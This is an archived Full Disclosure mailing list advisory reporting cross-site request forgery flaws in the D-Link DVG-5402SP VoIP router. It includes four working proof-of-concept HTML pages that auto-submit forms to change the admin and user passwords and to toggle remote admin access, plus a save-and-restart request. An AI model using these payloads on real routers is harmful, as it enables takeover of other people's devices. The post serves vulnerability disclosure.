[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] CSRF vulnerabilities in D-Link DVG-5402SP
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2017-07-31 20:55:20
Message-ID: 008901d30a3f$79985480$0100a8c0 () pc
[Download RAW message or body]
Hello list!
There are multiple Cross-Site Request Forgery vulnerabilities in D-Link
DVG-5402SP VoIP Router.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other
versions also must be vulnerable.
Since December 2014 the developers didn't answer me concerning
vulnerabilities in DVG-5402SP and other D-Link devices, which I informed
them about. Concerning these holes I informed them at 28.03.2016.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Change admin's password:
D-Link DVG-5402SP CSRF-1.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K13" value="1">
<input type="hidden" name="ot_confirm_password_K13" value="1">
</form>
</body>
</html>
Change user's password:
D-Link DVG-5402SP CSRF-2.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K374" value="1">
<input type="hidden" name="ot_confirm_password_K374" value="1">
</form>
</body>
</html>
Turn off remote access to web admin panel:
D-Link DVG-5402SP CSRF-3.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K626" value="0">
</form>
</body>
</html>
Turn on remote access to web admin panel:
D-Link DVG-5402SP CSRF-4.html
<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K626" value="1">
</form>
</body>
</html>
Similarly can be changed any settings in admin panel, such as turn off
telnet access.
Cross-Site Request Forgery (WASC-09):
After the change, the password must be saved and the device restarted by
separate GET request:
http://site/ConfigBackupForm.asp
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7597/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic